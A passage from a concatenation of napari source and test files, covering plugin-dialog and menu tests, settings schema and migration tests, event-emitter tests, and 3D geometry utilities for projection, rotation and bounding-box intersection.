qt_plugin_dialog,
"running_as_constructor_app",
lambda: False,
)
widget = qt_plugin_dialog.QtPluginDialog()
widget.show()
qtbot.wait(300)
qtbot.add_widget(widget)
return widget
@pytest.fixture
def plugin_dialog_constructor(qtbot, monkeypatch):
"""
Fixture that provides a plugin dialog for a constructor based install.
"""
for method_name in ["iter_hub_plugin_info", "iter_napari_plugin_info"]:
monkeypatch.setattr(
qt_plugin_dialog,
method_name,
_iter_napari_hub_or_pypi_plugin_info,
)
# This is patching `napari.utils.misc.running_as_constructor_app` function
# to mock a constructor based install.
monkeypatch.setattr(
qt_plugin_dialog,
"running_as_constructor_app",
lambda: True,
)
widget = qt_plugin_dialog.QtPluginDialog()
widget.show()
qtbot.wait(300)
qtbot.add_widget(widget)
return widget
def test_filter_not_available_plugins(plugin_dialog_constructor):
"""
Check that the plugins listed under available plugins are
enabled and disabled accordingly.
The first plugin ("test-name-0") is not available on conda-forge and
should be disabled, and show a tooltip warning.
The second plugin ("test-name-1") is available on conda-forge and
should be enabled without the tooltip warning.
"""
item = plugin_dialog_constructor.available_list.item(0)
widget = plugin_dialog_constructor.available_list.itemWidget(item)
if widget:
assert not widget.action_button.isEnabled()
assert widget.warning_tooltip.isVisible()
item = plugin_dialog_constructor.available_list.item(1)
widget = plugin_dialog_constructor.available_list.itemWidget(item)
assert widget.action_button.isEnabled()
assert not widget.warning_tooltip.isVisible()
def test_filter_available_plugins(plugin_dialog):
"""
Test the dialog is correctly filtering plugins in the available plugins
list (the bottom one).
"""
plugin_dialog.filter("")
assert plugin_dialog.available_list.count() == 2
assert plugin_dialog.available_list._count_visible() == 2
plugin_dialog.filter("no-match@123")
assert plugin_dialog.available_list._count_visible() == 0
plugin_dialog.filter("")
plugin_dialog.filter("test-name-0")
assert plugin_dialog.available_list._count_visible() == 1
def test_filter_installed_plugins(plugin_dialog):
"""
Test the dialog is correctly filtering plugins in the installed plugins
list (the top one).
"""
plugin_dialog.filter("")
assert plugin_dialog.installed_list._count_visible() >= 0
plugin_dialog.filter("no-match@123")
assert plugin_dialog.installed_list._count_visible() == 0
def test_visible_widgets(plugin_dialog):
"""
Test that the direct entry button and textbox are visible for
normal napari installs.
"""
assert plugin_dialog.direct_entry_edit.isVisible()
assert plugin_dialog.direct_entry_btn.isVisible()
def test_constructor_visible_widgets(plugin_dialog_constructor):
"""
Test that the direct entry button and textbox are hidden for
constructor based napari installs.
"""
assert not plugin_dialog_constructor.direct_entry_edit.isVisible()
assert not plugin_dialog_constructor.direct_entry_btn.isVisible()
```
#### File: menus/_tests/test_file_menu.py
```python
from unittest import mock
from npe2 import DynamicPlugin
from npe2.manifest.contributions import SampleDataURI
def test_sample_data_triggers_reader_dialog(
mock_npe2_pm, tmp_reader, make_napari_viewer
):
"""Sample data pops reader dialog if multiple compatible readers"""
# make two tmp readers that take tif files
tmp_reader(mock_npe2_pm, 'tif-reader', filename_patterns=['*.tif'])
tmp_reader(mock_npe2_pm, 'other-tif-reader', filename_patterns=['*.tif'])
# make a sample data reader for tif file
tmp_sample_plugin = DynamicPlugin('sample-plugin', mock_npe2_pm)
my_sample = SampleDataURI(
key='tmp-sample',
display_name='Temp Sample',
uri='some-path/some-file.tif',
)
tmp_sample_plugin.manifest.contributions.sample_data = [my_sample]
tmp_sample_plugin.register()
viewer = make_napari_viewer()
sample_action = viewer.window.file_menu.open_sample_menu.actions()[0]
with mock.patch(
'napari._qt.menus.file_menu.handle_gui_reading'
) as mock_read:
sample_action.trigger()
# assert that handle gui reading was called
mock_read.assert_called_once()
```
#### File: menus/_tests/test_util.py
```python
from unittest.mock import MagicMock
from qtpy.QtWidgets import QMenu
from napari._qt.menus._util import populate_menu
def test_populate_menu_create(qtbot):
"""Test the populate_menu function."""
mock = MagicMock()
menu = QMenu()
populate_menu(menu, [{"text": "test", "slot": mock}])
assert len(menu.actions()) == 1
assert menu.actions()[0].text() == "test"
assert menu.actions()[0].isCheckable() is False
with qtbot.waitSignal(menu.actions()[0].triggered):
menu.actions()[0].trigger()
mock.assert_called_once()
def test_populate_menu_create_checkable(qtbot):
"""Test the populate_menu function with checkable actions."""
mock = MagicMock()
menu = QMenu()
populate_menu(menu, [{"text": "test", "slot": mock, "checkable": True}])
assert len(menu.actions()) == 1
assert menu.actions()[0].text() == "test"
assert menu.actions()[0].isCheckable() is True
with qtbot.waitSignal(menu.actions()[0].triggered):
menu.actions()[0].trigger()
mock.assert_called_once_with(True)
mock.reset_mock()
with qtbot.waitSignal(menu.actions()[0].triggered):
menu.actions()[0].trigger()
mock.assert_called_once_with(False)
```
#### File: napari/settings/_napari_settings.py
```python
import os
from pathlib import Path
from typing import Any, Optional
from pydantic import Field
from ..utils._base import _DEFAULT_CONFIG_PATH
from ..utils.translations import trans
from ._appearance import AppearanceSettings
from ._application import ApplicationSettings
from ._base import _NOT_SET, EventedConfigFileSettings, _remove_empty_dicts
from ._experimental import ExperimentalSettings
from ._fields import Version
from ._plugins import PluginsSettings
from ._shortcuts import ShortcutsSettings
_CFG_PATH = os.getenv('NAPARI_CONFIG', _DEFAULT_CONFIG_PATH)
CURRENT_SCHEMA_VERSION = Version(0, 5, 0)
class NapariSettings(EventedConfigFileSettings):
"""Schema for napari settings."""
# 1. If you want to *change* the default value of a current option, you need to
# do a MINOR update in config version, e.g. from 3.0.0 to 3.1.0
# 2. If you want to *remove* options that are no longer needed in the codebase,
# or if you want to *rename* options, then you need to do a MAJOR update in
# version, e.g. from 3.0.0 to 4.0.0
# 3. You don't need to touch this value if you're just adding a new option
schema_version: Version = Field(
CURRENT_SCHEMA_VERSION,
description=trans._("Napari settings schema version."),
)
application: ApplicationSettings = Field(
default_factory=ApplicationSettings,
title=trans._("Application"),
description=trans._("Main application settings."),
)
appearance: AppearanceSettings = Field(
default_factory=AppearanceSettings,
title=trans._("Appearance"),
description=trans._("User interface appearance settings."),
)
plugins: PluginsSettings = Field(
default_factory=PluginsSettings,
title=trans._("Plugins"),
description=trans._("Plugins settings."),
)
shortcuts: ShortcutsSettings = Field(
default_factory=ShortcutsSettings,
title=trans._("Shortcuts"),
description=trans._("Shortcut settings."),
)
experimental: ExperimentalSettings = Field(
default_factory=ExperimentalSettings,
title=trans._("Experimental"),
description=trans._("Experimental settings."),
)
# private attributes and ClassVars will not appear in the schema
_config_path: Optional[Path] = Path(_CFG_PATH) if _CFG_PATH else None
class Config(EventedConfigFileSettings.Config):
env_prefix = 'napari_'
use_enum_values = False
# all of these fields are evented models, so we don't want to break
# connections by setting the top-level field itself
# (you can still mutate attributes in the subfields)
allow_mutation = False
@classmethod
def _config_file_settings_source(cls, settings) -> dict:
# before '0.4.0' we didn't write the schema_version in the file
        # written to disk. So if it's missing, add a schema_version of 0.3.0
d = super()._config_file_settings_source(settings)
d.setdefault('schema_version', '0.3.0')
return d
def __init__(self, config_path=_NOT_SET, **values: Any) -> None:
super().__init__(config_path, **values)
self._maybe_migrate()
def _save_dict(self, **kwargs):
# we always want schema_version written to the settings.yaml
# TODO: is there a better way to always include schema version?
return {
'schema_version': self.schema_version,
**super()._save_dict(**kwargs),
}
def __str__(self):
out = 'NapariSettings (defaults excluded)\n' + 34 * '-' + '\n'
data = self.dict(exclude_defaults=True)
out += self._yaml_dump(_remove_empty_dicts(data))
return out
def __repr__(self):
return str(self)
def _maybe_migrate(self):
if self.schema_version < CURRENT_SCHEMA_VERSION:
from ._migrations import do_migrations
do_migrations(self)
if __name__ == '__main__':
import sys
if len(sys.argv) > 2:
dest = Path(sys.argv[2]).expanduser().absolute()
else:
dest = Path(__file__).parent / 'napari.schema.json'
dest.write_text(NapariSettings.schema_json())
```
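The schema-version comments above pair with the migration machinery exercised in the next test file. A hypothetical migrator for a future bump might look like the sketch below (illustrative only: the version pair and the mutated field are invented, and importing this would register a real entry in `_migrations`):
```python
# Hypothetical migrator sketch, mirroring the decorator used in the tests below.
from napari.settings import _migrations

@_migrations.migrator('0.5.0', '0.6.0')
def _v050_to_v060(model):
    # e.g. flip a default whose meaning changed between schema versions
    model.appearance.theme = 'light'
```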
#### File: settings/_tests/test_migrations.py
```python
import os
from importlib.metadata import distribution
from unittest.mock import patch
import pytest
from napari.settings import NapariSettings, _migrations
@pytest.fixture
def _test_migrator(monkeypatch):
# this fixture makes sure we're not using _migrations.MIGRATORS for tests
# but rather only using migrators that get declared IN the test
_TEST_MIGRATORS = []
with monkeypatch.context() as m:
m.setattr(_migrations, "_MIGRATORS", _TEST_MIGRATORS)
yield _migrations.migrator
def test_no_migrations_available(_test_migrator):
# no migrators exist... nothing should happen
settings = NapariSettings(schema_version='0.1.0')
assert settings.schema_version == '0.1.0'
def test_backwards_migrator(_test_migrator):
# we shouldn't be able to downgrade the schema version
# if that is needed later, we can create a new decorator,
# or change this test
with pytest.raises(AssertionError):
@_test_migrator('0.2.0', '0.1.0')
def _(model):
...
def test_migration_works(_test_migrator):
# test that a basic migrator works to change the version
# and mutate the model
@_test_migrator('0.1.0', '0.2.0')
def _(model: NapariSettings):
model.appearance.theme = 'light'
settings = NapariSettings(schema_version='0.1.0')
assert settings.schema_version == '0.2.0'
assert settings.appearance.theme == 'light'
def test_migration_saves(_test_migrator):
@_test_migrator('0.1.0', '0.2.0')
def _(model: NapariSettings):
...
with patch.object(NapariSettings, 'save') as mock:
mock.assert_not_called()
settings = NapariSettings(config_path='junk', schema_version='0.1.0')
assert settings.schema_version == '0.2.0'
mock.assert_called()
def test_failed_migration_leaves_version(_test_migrator):
# if an error occurs IN the migrator, the version should stay
# where it was before the migration, and any changes reverted.
@_test_migrator('0.1.0', '0.2.0')
def _(model: NapariSettings):
model.appearance.theme = 'light'
assert model.appearance.theme == 'light'
raise ValueError('broken migration')
with pytest.warns(UserWarning) as e:
settings = NapariSettings(schema_version='0.1.0')
assert settings.schema_version == '0.1.0'
# test migration was atomic, and reverted the theme change
assert settings.appearance.theme == 'dark'
# test that the user was warned
assert 'Failed to migrate settings from v0.1.0 to v0.2.0' in str(e[0])
@pytest.mark.skipif(
bool(os.environ.get('MIN_REQ')), reason='not relevant for MIN_REQ'
)
def test_030_to_040_migration():
# Prior to v0.4.0, npe2 plugins were automatically "disabled"
# 0.3.0 -> 0.4.0 should remove any installed npe2 plugins from the
# set of disabled plugins (see migrator for details)
try:
d = distribution('napari-svg')
assert 'napari.manifest' in {ep.group for ep in d.entry_points}
except Exception:
pytest.fail(
'napari-svg not present as an npe2 plugin. '
'This test needs updating'
)
settings = NapariSettings(
schema_version='0.3.0',
plugins={'disabled_plugins': {'napari-svg', 'napari'}},
)
assert 'napari-svg' not in settings.plugins.disabled_plugins
assert 'napari' not in settings.plugins.disabled_plugins
@pytest.mark.skipif(
bool(os.environ.get('MIN_REQ')), reason='not relevant for MIN_REQ'
)
def test_040_to_050_migration():
# Prior to 0.5.0 existing preferences may have reader extensions
# preferences saved without a leading *.
# fnmatch would fail on these so we coerce them to include a *
# e.g. '.csv' becomes '*.csv'
settings = NapariSettings(
schema_version='0.4.0',
plugins={'extension2reader': {'.tif': 'napari'}},
)
assert '.tif' not in settings.plugins.extension2reader
assert '*.tif' in settings.plugins.extension2reader
```
#### File: events/_tests/test_event_emitter.py
```python
import weakref
from functools import partial
import pytest
from napari.utils.events import EventEmitter
def test_event_blocker_count_none():
"""Test event emitter block counter with no emission."""
e = EventEmitter(type="test")
with e.blocker() as block:
pass
assert block.count == 0
def test_event_blocker_count():
"""Test event emitter block counter with emission."""
e = EventEmitter(type="test")
with e.blocker() as block:
e()
e()
e()
assert block.count == 3
def test_weakref_event_emitter():
"""
    We are testing that an event blocker does not keep a hard reference to
    the object we are blocking, especially if it's a bound method.
    The reason it used to keep references is to get the count of how many times
    a callback was blocked, but if the object does not exist, then the bound method
    does not either, and thus there is no way to ask for its count.
    So we keep only weak refs.
"""
e = EventEmitter(type='test_weak')
class Obj:
def cb(self):
pass
o = Obj()
ref_o = weakref.ref(o)
e.connect(o.cb)
#
with e.blocker(o.cb):
e()
del o
assert ref_o() is None
@pytest.mark.parametrize('disconnect_and_should_be_none', [True, False])
def test_weakref_event_emitter_cb(disconnect_and_should_be_none):
"""
    As above but with a pure callback. We keep a reference to it; the
    reason is that, unlike with a bound method, the callback may be a closure and
    may not stick around.
    We thus expect the weakref to be None only if explicitly disconnected.
"""
e = EventEmitter(type='test_weak')
def cb(self):
pass
ref_cb = weakref.ref(cb)
e.connect(cb)
with e.blocker(cb):
e()
if disconnect_and_should_be_none:
e.disconnect(cb)
del cb
assert ref_cb() is None
else:
del cb
assert ref_cb() is not None
def test_error_on_connect():
"""Check that connections happen correctly even on decorated methods.
Some decorators will alter method.__name__, so that obj.method
will not be equal to getattr(obj, obj.method.__name__). We check here
that event binding will be correct even in these situations.
"""
def rename(newname):
def decorator(f):
f.__name__ = newname
return f
return decorator
class Test:
def __init__(self):
self.m1, self.m2, self.m4 = 0, 0, 0
@rename("nonexist")
def meth1(self, _event):
self.m1 += 1
@rename("meth1")
def meth2(self, _event):
self.m2 += 1
def meth3(self):
pass
def meth4(self, _event):
self.m4 += 1
t = Test()
e = EventEmitter(type="test")
e.connect(t.meth1)
e()
assert (t.m1, t.m2) == (1, 0)
e.connect(t.meth2)
e()
assert (t.m1, t.m2) == (2, 1)
meth = t.meth3
t.meth3 = "aaaa"
with pytest.raises(RuntimeError):
e.connect(meth)
e.connect(t.meth4)
assert t.m4 == 0
e()
assert t.m4 == 1
t.meth4 = None
with pytest.warns(RuntimeWarning, match="Problem with function"):
e()
assert t.m4 == 1
def test_event_order_func():
res_li = []
def fun1():
res_li.append(1)
def fun2(val):
res_li.append(val)
def fun3():
res_li.append(3)
def fun4():
res_li.append(4)
def fun5(val):
res_li.append(val)
def fun6(val):
res_li.append(val)
fun1.__module__ = "napari.test.sample"
fun3.__module__ = "napari.test.sample"
fun5.__module__ = "napari.test.sample"
e = EventEmitter(type="test")
e.connect(fun1)
e.connect(partial(fun2, val=2))
e()
assert res_li == [1, 2]
res_li = []
e.connect(fun3)
e()
assert res_li == [3, 1, 2]
res_li = []
e.connect(fun4)
e()
assert res_li == [3, 1, 4, 2]
res_li = []
e.connect(partial(fun5, val=5), position="last")
e()
assert res_li == [3, 1, 5, 4, 2]
res_li = []
e.connect(partial(fun6, val=6), position="last")
e()
assert res_li == [3, 1, 5, 4, 2, 6]
def test_event_order_methods():
res_li = []
class Test:
def fun1(self):
res_li.append(1)
def fun2(self):
res_li.append(2)
class Test2:
def fun3(self):
res_li.append(3)
def fun4(self):
res_li.append(4)
Test.__module__ = "napari.test.sample"
t1 = Test()
t2 = Test2()
e = EventEmitter(type="test")
e.connect(t1.fun1)
e.connect(t2.fun3)
e()
assert res_li == [1, 3]
res_li = []
e.connect(t1.fun2)
e.connect(t2.fun4)
e()
assert res_li == [2, 1, 4, 3]
def test_no_event_arg():
class TestOb:
def __init__(self):
self.count = 0
def fun(self):
self.count += 1
count = [0]
def simple_fun():
count[0] += 1
t = TestOb()
e = EventEmitter(type="test")
e.connect(t.fun)
e.connect(simple_fun)
e()
assert t.count == 1
assert count[0] == 1
def test_to_many_positional():
class TestOb:
def fun(self, a, b, c=1):
pass
def simple_fun(a, b):
pass
t = TestOb()
e = EventEmitter(type="test")
with pytest.raises(RuntimeError):
e.connect(t.fun)
with pytest.raises(RuntimeError):
e.connect(simple_fun)
def test_disconnect_object():
count_list = []
def fun1():
count_list.append(1)
class TestOb:
call_list_1 = []
call_list_2 = []
def fun1(self):
self.call_list_1.append(1)
def fun2(self):
self.call_list_2.append(1)
t = TestOb()
e = EventEmitter(type="test")
e.connect(t.fun1)
e.connect(t.fun2)
e.connect(fun1)
e()
assert t.call_list_1 == [1]
assert t.call_list_2 == [1]
assert count_list == [1]
e.disconnect(t)
e()
assert t.call_list_1 == [1]
assert t.call_list_2 == [1]
assert count_list == [1, 1]
def test_weakref_disconnect():
class TestOb:
call_list_1 = []
def fun1(self):
self.call_list_1.append(1)
def fun2(self, event):
self.call_list_1.append(2)
t = TestOb()
e = EventEmitter(type="test")
e.connect(t.fun1)
e()
assert t.call_list_1 == [1]
e.disconnect((weakref.ref(t), "fun1"))
e()
assert t.call_list_1 == [1]
e.connect(t.fun2)
e()
assert t.call_list_1 == [1, 2]
def test_none_disconnect():
count_list = []
def fun1():
count_list.append(1)
def fun2(event):
count_list.append(2)
e = EventEmitter(type="test")
e.connect(fun1)
e()
assert count_list == [1]
e.disconnect(None)
e()
assert count_list == [1]
e.connect(fun2)
e()
assert count_list == [1, 2]
```
#### File: napari/utils/geometry.py
```python
from typing import Dict, Optional, Tuple
import numpy as np
# normal vectors for a 3D axis-aligned box
# coordinates are ordered [z, y, x]
FACE_NORMALS = {
"x_pos": np.array([0, 0, 1]),
"x_neg": np.array([0, 0, -1]),
"y_pos": np.array([0, 1, 0]),
"y_neg": np.array([0, -1, 0]),
"z_pos": np.array([1, 0, 0]),
"z_neg": np.array([-1, 0, 0]),
}
def project_points_onto_plane(
points: np.ndarray, plane_point: np.ndarray, plane_normal: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""Project points on to a plane.
Plane is defined by a point and a normal vector. This function
is designed to work with points and planes in 3D.
Parameters
----------
points : np.ndarray
The coordinate of the point to be projected. The points
        should be 3D and have shape (N, 3) for N points.
plane_point : np.ndarray
The point on the plane used to define the plane.
Should have shape (3,).
plane_normal : np.ndarray
The normal vector used to define the plane.
Should be a unit vector and have shape (3,).
Returns
-------
projected_point : np.ndarray
The point that has been projected to the plane.
This is always an Nx3 array.
signed_distance_to_plane : np.ndarray
The signed projection distance between the points and the plane.
Positive values indicate the point is on the positive normal side of the plane.
Negative values indicate the point is on the negative normal side of the plane.
"""
points = np.atleast_2d(points)
plane_point = np.asarray(plane_point)
# make the plane normals have the same shape as the points
plane_normal = np.tile(plane_normal, (points.shape[0], 1))
# get the vector from point on the plane
# to the point to be projected
point_vector = points - plane_point
# find the distance to the plane along the normal direction
signed_distance_to_plane = np.multiply(point_vector, plane_normal).sum(
axis=1
)
# project the point
projected_points = points - (
signed_distance_to_plane[:, np.newaxis] * plane_normal
)
return projected_points, signed_distance_to_plane
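# Editor's usage sketch (illustrative only, not part of the original napari module):
# projecting a point onto the plane through the origin with normal (0, 0, 1)
# zeroes its last coordinate, and the signed distance is that coordinate.
#   >>> pts, dist = project_points_onto_plane(
#   ...     points=np.array([[1.0, 2.0, 3.0]]),
#   ...     plane_point=np.array([0.0, 0.0, 0.0]),
#   ...     plane_normal=np.array([0.0, 0.0, 1.0]),
#   ... )
#   # pts -> array([[1., 2., 0.]]), dist -> array([3.])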
def rotation_matrix_from_vectors_2d(
vec_1: np.ndarray, vec_2: np.ndarray
) -> np.ndarray:
"""Calculate the 2D rotation matrix to rotate vec_1 onto vec_2
Parameters
----------
vec_1 : np.ndarray
The (2,) array containing the starting vector.
vec_2 : np.ndarray
The (2,) array containing the destination vector.
Returns
-------
rotation_matrix : np.ndarray
        The (2, 2) transformation matrix that rotates vec_1 to vec_2.
"""
# ensure unit vectors
vec_1 = vec_1 / np.linalg.norm(vec_1)
vec_2 = vec_2 / np.linalg.norm(vec_2)
# calculate the rotation matrix
diagonal_1 = (vec_1[0] * vec_2[0]) + (vec_1[1] * vec_2[1])
    diagonal_2 = (vec_1[0] * vec_2[1]) - (vec_2[0] * vec_1[1])
rotation_matrix = np.array(
[[diagonal_1, -1 * diagonal_2], [diagonal_2, diagonal_1]]
)
return rotation_matrix
def rotation_matrix_from_vectors_3d(vec_1, vec_2):
"""Calculate the rotation matrix that aligns vec1 to vec2.
Parameters
----------
vec_1 : np.ndarray
The vector you want to rotate
vec_2 : np.ndarray
The vector you would like to align to.
Returns
-------
rotation_matrix : np.ndarray
The rotation matrix that aligns vec_1 with vec_2.
That is rotation_matrix.dot(vec_1) == vec_2
"""
vec_1 = (vec_1 / np.linalg.norm(vec_1)).reshape(3)
vec_2 = (vec_2 / np.linalg.norm(vec_2)).reshape(3)
cross_prod = np.cross(vec_1, vec_2)
dot_prod = np.dot(vec_1, vec_2)
if any(cross_prod): # if not all zeros then
s = np.linalg.norm(cross_prod)
kmat = np.array(
[
[0, -cross_prod[2], cross_prod[1]],
[cross_prod[2], 0, -cross_prod[0]],
[-cross_prod[1], cross_prod[0], 0],
]
)
rotation_matrix = (
np.eye(3) + kmat + kmat.dot(kmat) * ((1 - dot_prod) / (s**2))
)
else:
if np.allclose(dot_prod, 1):
# if the vectors are already aligned, return the identity
rotation_matrix = np.eye(3)
else:
# if the vectors are in opposite direction, rotate 180 degrees
rotation_matrix = np.diag([-1, -1, 1])
return rotation_matrix
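# Editor's usage sketch (illustrative only, not part of the original napari module):
# rotating the x-axis onto the y-axis gives a 90-degree rotation about z.
#   >>> R = rotation_matrix_from_vectors_3d(np.array([1, 0, 0]), np.array([0, 1, 0]))
#   >>> np.allclose(R.dot([1, 0, 0]), [0, 1, 0])   # -> True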
def rotate_points(
points: np.ndarray,
current_plane_normal: np.ndarray,
new_plane_normal: np.ndarray,
) -> Tuple[np.ndarray, np.ndarray]:
"""Rotate points using a rotation matrix defined by the rotation from
current_plane to new_plane.
Parameters
----------
points : np.ndarray
The points to rotate. They should all lie on the same plane with the
normal vector current_plane_normal. Should be (NxD) array.
current_plane_normal : np.ndarray
The normal vector for the plane the points currently reside on.
new_plane_normal : np.ndarray
The normal vector for the plane the points will be rotated to.
Returns
-------
rotated_points : np.ndarray
The points that have been rotated
rotation_matrix : np.ndarray
The rotation matrix used for rotating the points.
"""
rotation_matrix = rotation_matrix_from_vectors_3d(
current_plane_normal, new_plane_normal
)
rotated_points = points @ rotation_matrix.T
return rotated_points, rotation_matrix
def point_in_bounding_box(point: np.ndarray, bounding_box: np.ndarray) -> bool:
"""Determine whether an nD point is inside an nD bounding box.
Parameters
----------
point : np.ndarray
(n,) array containing nD point coordinates to check.
bounding_box : np.ndarray
(2, n) array containing the min and max of the nD bounding box.
As returned by `Layer._extent_data`.
"""
if np.all(point >= bounding_box[0]) and np.all(point <= bounding_box[1]):
return True
return False
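# Editor's usage sketch (illustrative only, not part of the original napari module):
#   >>> bbox = np.array([[0, 0, 0], [10, 10, 10]])   # rows are the min and max corners
#   >>> point_in_bounding_box(np.array([5, 5, 5]), bbox)    # -> True
#   >>> point_in_bounding_box(np.array([5, 5, 11]), bbox)   # -> False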
def clamp_point_to_bounding_box(point: np.ndarray, bounding_box: np.ndarray):
"""Ensure that a point is inside of the bounding box. If the point has a
coordinate outside of the bounding box, the value is clipped to the max
extent of the bounding box.
Parameters
----------
point : np.ndarray
n-dimensional point as an (n,) ndarray. Multiple points can
be passed as an (n, D) array.
bounding_box : np.ndarray
n-dimensional bounding box as a (n, 2) ndarray
Returns
-------
clamped_point : np.ndarray
`point` clamped to the limits of `bounding_box`
"""
clamped_point = np.clip(point, bounding_box[:, 0], bounding_box[:, 1] - 1)
return clamped_point
def face_coordinate_from_bounding_box(
bounding_box: np.ndarray, face_normal: np.ndarray
) -> float:
"""Get the coordinate for a given face in an axis-aligned bounding box.
For example, if the bounding box has extents [[0, 10], [0, 20], [0, 30]]
(ordered zyx), then the face with normal [0, 1, 0] is described by
y=20. Thus, the face_coordinate in this case is 20.
Parameters
----------
bounding_box : np.ndarray
n-dimensional bounding box as a (n, 2) ndarray.
Each row should contain the [min, max] extents for the
axis.
face_normal : np.ndarray
normal vector of the face as an (n,) ndarray
Returns
-------
face_coordinate : float
The value where the bounding box face specified by face_normal intersects
the axis its normal is aligned with.
"""
axis = np.argwhere(face_normal)
if face_normal[axis] > 0:
# face is pointing in the positive direction,
# take the max extent
face_coordinate = bounding_box[axis, 1]
else:
# face is pointing in the negative direction,
# take the min extent
face_coordinate = bounding_box[axis, 0]
return face_coordinate
def intersect_line_with_axis_aligned_plane(
plane_intercept: float,
plane_normal: np.ndarray,
line_start: np.ndarray,
line_direction: np.ndarray,
) -> np.ndarray:
"""Find the intersection of a line with an axis aligned plane.
Parameters
----------
plane_intercept : float
The coordinate that the plane intersects on the axis to which plane is
normal.
For example, if the plane is described by y=42, plane_intercept is 42.
plane_normal : np.ndarray
normal vector of the plane as an (n,) ndarray
line_start : np.ndarray
start point of the line as an (n,) ndarray
line_direction : np.ndarray
direction vector of the line as an (n,) ndarray
Returns
-------
intersection_point : np.ndarray
point where the line intersects the axis aligned plane
"""
# find the axis the plane exists in
plane_axis = np.squeeze(np.argwhere(plane_normal))
# get the intersection coordinate
t = (plane_intercept - line_start[plane_axis]) / line_direction[plane_axis]
return line_start + t * line_direction
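# Editor's usage sketch (illustrative only, not part of the original napari module):
# a line starting at the origin travelling along +y reaches the plane y=42 at (0, 42, 0).
#   >>> intersect_line_with_axis_aligned_plane(
#   ...     42, np.array([0, 1, 0]), np.array([0, 0, 0]), np.array([0, 1, 0]))
#   # -> array([ 0., 42.,  0.])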
def bounding_box_to_face_vertices(
bounding_box: np.ndarray,
) -> Dict[str, np.ndarray]:
"""From a layer bounding box (N, 2), N=ndim, return a dictionary containing
the vertices of each face of the bounding_box.
Parameters
----------
bounding_box : np.ndarray
(N, 2), N=ndim array with the min and max value for each dimension of
        the bounding box. The bounding box is taken from the last
three rows, which are assumed to be in order (z, y, x).
Returns
-------
face_coords : Dict[str, np.ndarray]
A dictionary containing the coordinates for the vertices for each face.
The keys are strings: 'x_pos', 'x_neg', 'y_pos', 'y_neg', 'z_pos', 'z_neg'.
'x_pos' is the face with the normal in the positive x direction and
'x_neg' is the face with the normal in the negative direction.
Coordinates are ordered (z, y, x).
"""
x_min, x_max = bounding_box[-1, :]
y_min, y_max = bounding_box[-2, :]
z_min, z_max = bounding_box[-3, :]
face_coords = {
"x_pos": np.array(
[
[z_min, y_min, x_max],
[z_min, y_max, x_max],
[z_max, y_max, x_max],
[z_max, y_min, x_max],
]
),
"x_neg": np.array(
[
[z_min, y_min, x_min],
[z_min, y_max, x_min],
[z_max, y_max, x_min],
[z_max, y_min, x_min],
]
),
"y_pos": np.array(
[
[z_min, y_max, x_min],
[z_min, y_max, x_max],
[z_max, y_max, x_max],
[z_max, y_max, x_min],
]
),
"y_neg": np.array(
[
[z_min, y_min, x_min],
[z_min, y_min, x_max],
[z_max, y_min, x_max],
[z_max, y_min, x_min],
]
),
"z_pos": np.array(
[
[z_max, y_min, x_min],
[z_max, y_min, x_max],
[z_max, y_max, x_max],
[z_max, y_max, x_min],
]
),
"z_neg": np.array(
[
[z_min, y_min, x_min],
[z_min, y_min, x_max],
[z_min, y_max, x_max],
[z_min, y_max, x_min],
]
),
}
return face_coords
def inside_triangles(triangles):
"""Checks which triangles contain the origin
Parameters
----------
triangles : (N, 3, 2) array
Array of N triangles that should be checked
Returns
-------
inside : (N,) array of bool
Array with `True` values for triangles containing the origin
"""
AB = triangles[:, 1, :] - triangles[:, 0, :]
AC = triangles[:, 2, :] - triangles[:, 0, :]
BC = triangles[:, 2, :] - triangles[:, 1, :]
s_AB = -AB[:, 0] * triangles[:, 0, 1] + AB[:, 1] * triangles[:, 0, 0] >= 0
s_AC = -AC[:, 0] * triangles[:, 0, 1] + AC[:, 1] * triangles[:, 0, 0] >= 0
s_BC = -BC[:, 0] * triangles[:, 1, 1] + BC[:, 1] * triangles[:, 1, 0] >= 0
inside = np.all(np.array([s_AB != s_AC, s_AB == s_BC]), axis=0)
return inside
def intersect_line_with_plane_3d(
line_position: np.ndarray,
line_direction: np.ndarray,
plane_position: np.ndarray,
plane_normal: np.ndarray,
) -> np.ndarray:
"""Find the intersection of a line with an arbitrarily oriented plane in 3D.
The line is defined by a position and a direction vector.
The plane is defined by a position and a normal vector.
https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
Parameters
----------
line_position : np.ndarray
a position on a 3D line with shape (3,).
line_direction : np.ndarray
direction of the 3D line with shape (3,).
plane_position : np.ndarray
a position on a plane in 3D with shape (3,).
plane_normal : np.ndarray
a vector normal to the plane in 3D with shape (3,).
Returns
-------
plane_intersection : np.ndarray
the intersection of the line with the plane, shape (3,)
"""
# cast to arrays
line_position = np.asarray(line_position, dtype=float)
line_direction = np.asarray(line_direction, dtype=float)
plane_position = np.asarray(plane_position, dtype=float)
plane_normal = np.asarray(plane_normal, dtype=float)
# project direction between line and plane onto the plane normal
line_plane_direction = plane_position - line_position
line_plane_on_plane_normal = np.dot(line_plane_direction, plane_normal)
# project line direction onto the plane normal
line_direction_on_plane_normal = np.dot(line_direction, plane_normal)
# find scale factor for line direction
scale_factor = line_plane_on_plane_normal / line_direction_on_plane_normal
return line_position + (scale_factor * line_direction)
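# Editor's usage sketch (illustrative only, not part of the original napari module):
# a ray starting at (0, 0, -1) pointing along +z crosses the z=0 plane at the origin.
#   >>> intersect_line_with_plane_3d([0, 0, -1], [0, 0, 1], [0, 0, 0], [0, 0, 1])
#   # -> array([0., 0., 0.])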
def intersect_line_with_multiple_planes_3d(
line_position: np.ndarray,
line_direction: np.ndarray,
plane_position: np.ndarray,
plane_normal: np.ndarray,
) -> np.ndarray:
"""Find the intersection of a line with multiple arbitrarily oriented planes in 3D.
The line is defined by a position and a direction vector.
The plane is defined by a position and a normal vector.
https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
Parameters
----------
line_position : np.ndarray
a position on a 3D line with shape (3,).
line_direction : np.ndarray
direction of the 3D line with shape (3,).
plane_position : np.ndarray
point on a plane in 3D with shape (n, 3) for n planes.
plane_normal : np.ndarray
a vector normal to the plane in 3D with shape (n,3) for n planes.
Returns
-------
plane_intersection : np.ndarray
the intersection of the line with the plane, shape (3,)
"""
# cast to arrays
line_position = np.asarray(line_position, dtype=float)
line_direction = np.asarray(line_direction, dtype=float)
plane_position = np.atleast_2d(plane_position).astype(float)
plane_normal = np.atleast_2d(plane_normal).astype(float)
# project direction between line and plane onto the plane normal
line_plane_direction = plane_position - line_position
line_plane_on_plane_normal = np.sum(
